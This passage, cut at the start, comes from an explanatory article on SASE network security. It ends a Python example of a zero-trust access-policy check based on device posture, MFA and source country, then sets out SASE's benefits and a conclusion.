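            and req.source_country not in policy.allowed_countries):
        reasons.append(f"source country {req.source_country} not permitted")
    return (not reasons), reasons


if __name__ == "__main__":
    healthy = DevicePosture(True, True, True, True)
    demo = AccessRequest("alice", {"finance", "employees"}, True,
                         healthy, "US", "payroll-app")
    print(evaluate(demo))
```

Because the decision is re-run for every request, a change in any input (MFA expiring, EDR stopping, a new source country) flips the outcome on the next request without tearing down a tunnel, which is the property the ZTNA description refers to.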

Section 3: The Benefits of SASE

SASE brings numerous advantages to organizations seeking enhanced network security and performance:

1. Simplified Architecture: By consolidating various network and security functions, SASE eliminates the need for multiple point solutions, reducing complexity and management overhead.

2. Enhanced Security: With its comprehensive approach, SASE provides robust protection against emerging threats, ensuring data confidentiality and integrity across the network.

3. Improved User Experience: SASE enables secure access to applications and data from any location, offering a seamless user experience without compromising security.

Conclusion:

In conclusion, SASE represents a paradigm shift in network security, revolutionizing how organizations approach their network architecture. By converging security and networking functions, SASE provides a comprehensive and scalable solution that addresses the evolving challenges of today’s digital landscape. Embracing SASE empowers organizations to navigate the complexities of network security and adopt a future-ready approach.